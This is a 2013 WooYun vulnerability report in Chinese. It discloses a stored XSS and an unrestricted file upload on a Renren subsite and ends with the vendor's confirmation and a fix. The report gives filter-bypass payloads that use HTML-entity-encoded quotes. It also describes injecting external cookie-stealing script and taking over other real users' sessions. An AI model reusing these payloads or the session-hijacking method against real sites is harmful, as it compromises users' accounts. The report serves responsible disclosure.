当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033233

漏洞标题:人人网某分站储存型xss漏洞及上传问题

相关厂商:人人网

漏洞作者: px1624

提交时间:2013-08-02 07:47

修复时间:2013-09-16 07:47

公开时间:2013-09-16 07:47

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-02: 细节已通知厂商并且等待厂商处理中
2013-08-02: 厂商已经确认,细节仅向厂商公开
2013-08-12: 细节向核心白帽子及相关领域专家公开
2013-08-22: 细节向普通白帽子公开
2013-09-01: 细节向实习白帽子公开
2013-09-16: 细节向公众公开

简要描述:

晚上在人人网随便转了转,随手测试了下,发现人人网某分站存在储存型xss,可以盲打后台管理,也可以盗取他人登录cookie(已经证明)。上传位置也有些问题,我做了初步检测,你们自己仔细查查吧,请别给个位数的rank额。

详细说明:

1 存在漏洞的分站是这个:

http://mentos.renren.com/


0.png


2 上传作品,发现标题位置的字符会输出在js中。果断构造一下xss代码测试,xss代码:

',(function(){alert(1)}()),'

F12看了下源码,发现'号被过滤成了′
源码:

<a href="javascript:void(0)" onclick="all_video_play(324,'′,(function(){alert(1)}()),′',0,'94678153','http://v139.56img.com/images/28/5/coop_3000002383i56olo56i56.com_cw_137535892041hd.jpg','u')"><img src="http://v139.56img.com/images/28/5/coop_3000002383i56olo56i56.com_cw_137535892041hd.jpg" width="135" height="100" alt=""></a>


1.png


3 将'改为html的编码&#39; 然后写入,xss代码为:

&#39;,(function(){alert(1)}()),&#39;


F12看一下,吼吼,成功解析了。
源码

:<a href="javascript:void(0)" onclick="all_video_play(325,'',(function(){alert(1)}()),'',0,'http://yx.xnimg.cn/M04/22/1308/71/YJjIVnQrU36jai2aimQb63yi.ori.mp3','http://yx.xnimg.cn/M04/62/41/41/ZrIJ3yZrmE3ejaINBjAFvmYz.ori.jpg','m')"><img src="http://yx.xnimg.cn/M04/62/41/41/ZrIJ3yZrmE3ejaINBjAFvmYz.ori.jpg" width="135" height="100" alt=""></a>


2.png


4 点击一下试试,成功弹窗了。

3.png


5 尝试将"><也写成html的&#模式,发现这里对于这三个字符会进行二次过滤,过滤为&quot;&gt;&lt;
源码:

<a href="javascript:void(0)" onclick="all_video_play(326,'')&quot;&gt;&lt;img src=1 onerror=alert(22)&gt;',0,'http://yx.xnimg.cn/M02/22/1308/79/Zzq6vyB7Rz2uUNN3Yf6RvuAr.ori.mp3','http://yx.xnimg.cn/M04/62/78/78/ym2emmbEB7niZNBnMbuyYfa2.ori.jpg','m')"><img src="http://yx.xnimg.cn/M04/62/78/78/ym2emmbEB7niZNBnMbuyYfa2.ori.jpg" width="135" height="100" alt=""></a>


6 测试一下有么有其他限制,能不能插入调用外部js文件的代码。结果表示无压力额~

4.png


7 可以写入盗取用户登录cookie的代码。虽然这里是点击型xss,但是中招率貌似还比较高,可能由于是点击播放视频或者音频的原因吧。吼吼,不一会就收到了几个,地址各异,不是很清楚中招的渠道都有哪些。

5.png


6.png


8 测试cookie可以成功登录他人账户,并随意进行操作(请放心,我没有发布或者操作用户的任何东西)。

7.png


8.png


管理员不知道是下班了还是比较聪明,我等了半个小时,管理的cookie也没弄到。可能因为我前面插了个alert(1)他发现后留意到了吧。不过根据我以前xss过那么多次人人网的经验,这里管理后台肯定是没有进行xss的二次过滤的。这里我也就不再等管理员cookie去登录后台截图了,反正这种后台应该也没啥东西。。
9 这里的上传也有问题,图片位置和视频位置都可以传非法文件上去。我随便写了个txt,后缀改为xx.jpg xx.mp3就直接给传上去了。。。

漏洞证明:

请看上面详情。

修复方案:

1 对'号进行二次过滤。
2 上传位置判断做一下判断。

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-08-02 16:21

厂商回复:

已修复,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-02 07:48 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2013-08-02 07:58 | nauscript ( 普通白帽子 | Rank:291 漏洞数:57 | 我淫荡啊我淫荡)

    mark too

  3. 2013-08-02 08:25 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    mark three

  4. 2013-08-02 09:36 | c2c2 ( 路人 | Rank:4 漏洞数:4 )

    mark four

  5. 2013-08-02 09:41 | Adra1n ( 普通白帽子 | Rank:437 漏洞数:68 )

    mark five.

  6. 2013-08-02 10:29 | 蘑菇 ( 路人 | Rank:11 漏洞数:1 | 没有做不到的,只有想不到的!)

    mark six

  7. 2013-08-02 11:41 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    mark 柒

  8. 2013-08-02 11:50 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    mark 奶

  9. 2013-08-02 17:19 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    原来是被这12rank 给超越了。。

  10. 2013-08-02 17:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @齐迹 。。。我都两个月没怎么发力了。。。

  11. 2013-08-02 18:20 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @px1624 坐等发力!

  12. 2013-08-02 18:26 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @齐迹 略虚。。